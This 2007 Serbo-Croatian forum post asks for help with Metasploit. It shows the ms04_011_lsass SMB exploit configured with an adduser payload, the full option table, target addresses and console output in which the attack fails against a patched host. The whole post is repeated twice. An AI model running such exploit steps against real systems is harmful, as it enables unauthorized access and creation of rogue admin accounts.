S.S.T. @ 03.10.2007. 19:15
POzdrav,
Probavao sam neke exploite sa VMware-u i napadao drugi comp koji je umrezen sa ovim na kojem je VMware! Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!
Kasnije sam uzeo ovaj za admin pass (bilo mi je interesantno pa sam ga zato uzeo)! Isao sam ovim redosledom ali ne radi:
use windows/smb/ms04_011_lsass
set PAYLOAD windows/adduser
>> set
Global
======
No entries in data store.
Module: windows/smb/ms04_011_lsass
==================================
Name Value
---- -----
DCERPC::fake_bind_multi true
DCERPC::fake_bind_multi_append 0
DCERPC::fake_bind_multi_prepend 0
DCERPC::max_frag_size 4096
DCERPC::smb_pipeio rw
ENCODER
EXITFUNC thread
PASS metas
PAYLOAD windows/adduser
RHOST 193.154.0.3
RPORT 445
SMB::obscure_trans_pipe_level 0
SMB::pad_data_level 0
SMB::pad_file_level 0
SMB::pipe_evasion false
SMB::pipe_read_max_size 1024
SMB::pipe_read_min_size 1
SMB::pipe_write_max_size 1024
SMB::pipe_write_min_size 1
SMBDirect true
SMBDomain WORKGROUP
SMBName *SMBSERVER
SMBPass
SMBUser
SSL false
TARGET 1
TCP::max_send_size 0
TCP::send_delay 0
USER metas
WfsDelay 0
>> exploit
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Server appears to have been patched
[*] Exploit completed, but no session was created.
Ne kreira mi uopste account metasploit prilikom logina!
Probavao sam neke exploite sa VMware-u i napadao drugi comp koji je umrezen sa ovim na kojem je VMware! Pokusavao sam i za VNC, ali ne znam tacno sta da upisem vrijednosti LHOST,LPORT,RHOST i RPORT!
Kasnije sam uzeo ovaj za admin pass (bilo mi je interesantno pa sam ga zato uzeo)! Isao sam ovim redosledom ali ne radi:
use windows/smb/ms04_011_lsass
set PAYLOAD windows/adduser
>> set
Global
======
No entries in data store.
Module: windows/smb/ms04_011_lsass
==================================
Name Value
---- -----
DCERPC::fake_bind_multi true
DCERPC::fake_bind_multi_append 0
DCERPC::fake_bind_multi_prepend 0
DCERPC::max_frag_size 4096
DCERPC::smb_pipeio rw
ENCODER
EXITFUNC thread
PASS metas
PAYLOAD windows/adduser
RHOST 193.154.0.3
RPORT 445
SMB::obscure_trans_pipe_level 0
SMB::pad_data_level 0
SMB::pad_file_level 0
SMB::pipe_evasion false
SMB::pipe_read_max_size 1024
SMB::pipe_read_min_size 1
SMB::pipe_write_max_size 1024
SMB::pipe_write_min_size 1
SMBDirect true
SMBDomain WORKGROUP
SMBName *SMBSERVER
SMBPass
SMBUser
SSL false
TARGET 1
TCP::max_send_size 0
TCP::send_delay 0
USER metas
WfsDelay 0
>> exploit
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.2[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Server appears to have been patched
[*] Exploit completed, but no session was created.
Ne kreira mi uopste account metasploit prilikom logina!